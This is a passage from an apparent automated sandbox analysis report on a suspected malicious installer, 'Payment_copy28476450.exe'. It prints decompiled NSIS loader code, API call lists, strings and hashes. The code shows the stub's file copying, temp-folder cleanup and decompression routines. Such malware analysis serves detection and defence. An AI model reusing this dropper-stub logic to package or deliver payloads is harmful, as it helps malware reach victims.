											do {
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\engineer\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\engineer\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}

0x00403260
0x00403264
0x0040326c
0x0040326e
0x00403273
0x00403283
0x00403286
0x0040328d
0x00403294
0x00403294
0x0040328d
0x0040329b
0x004032a5
0x004032af
0x004032b6
0x004032bd
0x004032c2
0x004032c7
0x004032ce
0x004032d4
0x004032ea
0x004032fa
0x004032ff
0x00403305
0x0040330c
0x0040331f
0x00403324
0x00403326
0x00403328
0x0040332d
0x0040332d
0x0040333d
0x00403343
0x004033ac
0x004033ac
0x004033ae
0x004033b0
0x00000000
0x00000000
0x00403349
0x0040334c
0x00403354
0x00403354
0x00403357
0x0040335c
0x0040335e
0x0040335e
0x0040335f
0x0040335f
0x00403364
0x00403367
0x0040339c
0x004033a1
0x004033a6
0x004033a9
0x004033ab
0x004033ab
0x004033ab
0x00000000
0x00403369
0x00403369
0x0040336a
0x0040336d
0x00403375
0x00403378
0x0040337a
0x0040337a
0x0040337a
0x00403378
0x0040337d
0x00403383
0x0040338b
0x0040338e
0x00403390
0x00403390
0x00403390
0x0040338e
0x00403393
0x0040339a
0x004033b4
0x004033b7
0x004033c0
0x004033c5
0x004033c5
0x004033d0
0x004033d6
0x004033db
0x004033dd
0x004033ff
0x00403404
0x0040340b
0x00403412
0x00403416
0x0040347d
0x0040347d
0x00403482
0x00403488
0x0040348c
0x004035a1
0x004035a7
0x00403644
0x00403644
0x00403649
0x0040364c
0x0040364e
0x0040364e
0x00403656
0x00403656
0x004035b6
0x004035bf
0x004035c1
0x004035c6
0x004035c8
0x004035ca
0x004035cc
0x004035ce
0x004035d0
0x004035d2
0x004035e2
0x004035e4
0x004035e6
0x004035f3
0x00403602
0x0040360a
0x00403612
0x00403612
0x004035e6
0x004035d2
0x004035ce
0x00403616
0x0040361b
0x00403622
0x00403630
0x00403633
0x00403639
0x0040363b
0x00000000
0x00000000
0x00000000
0x00403624
0x0040362a
0x0040362c
0x0040362e
0x0040363d
0x0040363f
0x00000000
0x0040363f
0x00000000
0x0040362e
0x00403622
0x0040349b
0x004034a2
0x004034a2
0x0040341e
0x0040346d
0x0040346d
0x00403479
0x00000000
0x00403479
0x00403427
0x00403434
0x0040342b
0x00403431
0x00000000
0x00000000
0x00403433
0x00403433
0x00403433
0x00403438
0x0040343a
0x00403442
0x004034b3
0x004034b5
0x004034bc
0x004034c4
0x004034c4
0x004034cf
0x004034d4
0x004034e3
0x004034e7
0x004034e8
0x004034f1
0x004034ea
0x004034ea
0x004034ea
0x004034f7
0x004034fd
0x00403503
0x0040350b
0x0040350b
0x00403519
0x00403520
0x00403529
0x0040352f
0x0040353b
0x00403541
0x0040354b
0x00403555
0x0040355b
0x0040355d
0x0040355f
0x00403560
0x00403561
0x00403572
0x00403578
0x0040357f
0x00403582
0x00403588
0x00403588
0x0040357f
0x0040355d
0x0040358c
0x00403592
0x00403592
0x00403592
0x00403595
0x00403596
0x00403597
0x00403597
0x00000000
0x004034e3
0x00403444
0x00403446
0x00403451
0x00000000
0x00000000
0x00403459
0x00403464
0x00403469
0x00000000
0x00403469
0x004033e5
0x004033f1
0x004033f6
0x004033fb
0x004033fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040339a
0x00000000
0x00000000
0x00000000
0x0040334e
0x0040334e
0x0040334e
0x0040334f
0x0040334f
0x00000000
0x0040334e
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403273
GetVersion.KERNEL32 ref: 00403279
#17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
OleInitialize.OLE32(00000000), ref: 004032CE
SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000), ref: 00403312
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Payment_copy28476450.exe",00409130), ref: 0040333D
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
DeleteFileA.KERNELBASE(1033), ref: 00403404

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

ExitProcess.KERNEL32(00000000), ref: 0040347D
OleUninitialize.OLE32(00000000), ref: 00403482
ExitProcess.KERNEL32 ref: 004034A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000,00000000), ref: 004034B5
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000,00000000), ref: 004034C4
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000,00000000), ref: 004034CF
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000,00000000), ref: 004034DB
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
CopyFileA.KERNEL32(C:\Users\user\Desktop\Payment_copy28476450.exe,0041F138,00000001), ref: 00403555
CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
ExitProcess.KERNEL32 ref: 00403656

Strings

_?=, xrefs: 0040342B
/D=, xrefs: 00403393
", xrefs: 0040335F
UXTHEME, xrefs: 00403296
C:\Users\user\AppData\Local\Temp, xrefs: 0040345F
1033, xrefs: 004033FF
C:\Users\user\AppData\Local\Temp, xrefs: 004033BB, 00403454, 004034FD, 00403506
, xrefs: 0040326E
USERENV, xrefs: 004032A0
C:\Users\user\AppData\Local\Temp\, xrefs: 004033C5, 004033CA, 004033E4, 004033F0, 004034B2, 004034C3, 004034CE, 004034DA, 004034E7, 004034F6, 00403596
C:\Users\user\Desktop, xrefs: 004034D4, 004034D9, 00403505
NSIS Error, xrefs: 004032F0
~nsu, xrefs: 004034AD
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403264
C:\Users\user\Desktop\Payment_copy28476450.exe, xrefs: 00403550
Error launching installer, xrefs: 0040343A
.tmp, xrefs: 004034C9
\Temp, xrefs: 004033EB
SeShutdownPrivilege, xrefs: 004035ED
NCRC, xrefs: 0040337D
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00403305, 0040330B, 00403421
SETUPAPI, xrefs: 004032AA

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Payment_copy28476450.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_copy28476450.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
API String ID: 2193684524-2634228935
Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040562b
0x0040562f
0x00405638
0x0040563b
0x0040563e
0x00405646
0x00405648
0x00405649
0x00000000
0x00405649
0x00405658
0x00405658
0x0040565b
0x0040565e
0x00405672
0x00405679
0x0040567e
0x00405680
0x00405690
0x00405682
0x00405688
0x00405688
0x00405695
0x00405698
0x004056a3
0x004056a9
0x004056ae
0x004056be
0x004056c0
0x004056c6
0x004056c9
0x004056cc
0x00405789
0x00405789
0x0040578d
0x0040578f
0x0040578f
0x0040578f
0x0040578f
0x00000000
0x00000000
0x00000000
0x00000000
0x004056d2
0x004056d2
0x004056db
0x004056e1
0x004056e6
0x004056e9
0x004056eb
0x004056ef
0x004056f1
0x004056f1
0x004056ef
0x004056f4
0x004056f7
0x0040570a
0x0040570c
0x00405711
0x00405718
0x00405730
0x00405736
0x0040573c
0x0040573e
0x00405763
0x00405740
0x00405740
0x00405744
0x00405758
0x00405746
0x00405749
0x0040574e
0x00405750
0x00405751
0x00405751
0x00405744
0x0040571a
0x00405720
0x00405722
0x00405728
0x00405728
0x00405722
0x00000000
0x00405718
0x004056f9
0x004056fc
0x004056fe
0x00000000
0x00000000
0x00405700
0x00405702
0x00000000
0x00000000
0x00405704
0x00405708
0x00000000
0x00000000
0x00000000
0x00405768
0x00405772
0x00405778
0x00405778
0x00405783
0x00000000
0x00405783
0x0040569a
0x004056a1
0x00000000
0x00000000
0x00000000
0x00405660
0x00405660
0x00405662
0x00405793
0x00405796
0x00405799
0x004057eb
0x004057eb
0x004057eb
0x0040579b
0x0040579e
0x004057a9
0x004057ae
0x004057b0
0x00000000
0x00000000
0x004057b3
0x004057b9
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057e3
0x004057c9
0x004057cd
0x00000000
0x00000000
0x004057d2
0x004057d7
0x004057d8
0x00000000
0x004057d9
0x004057a0
0x004057a0
0x00000000
0x004057a0
0x00405668
0x0040566c
0x00000000
0x00000000
0x00000000
0x0040566c

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 0040563E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405688
lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 004056A9
lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 004056AF
FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 004056C0
FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
FindClose.KERNELBASE(?), ref: 00405783

Strings

C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*, xrefs: 00405672, 00405678, 00405687, 004056BD
C:\Users\user\AppData\Local\Temp\, xrefs: 0040562A
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00405620
\*.*, xrefs: 00405682

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Payment_copy28476450.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsg6B4E.tmp\*.*$\*.*
API String ID: 2035342205-2960653264
Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
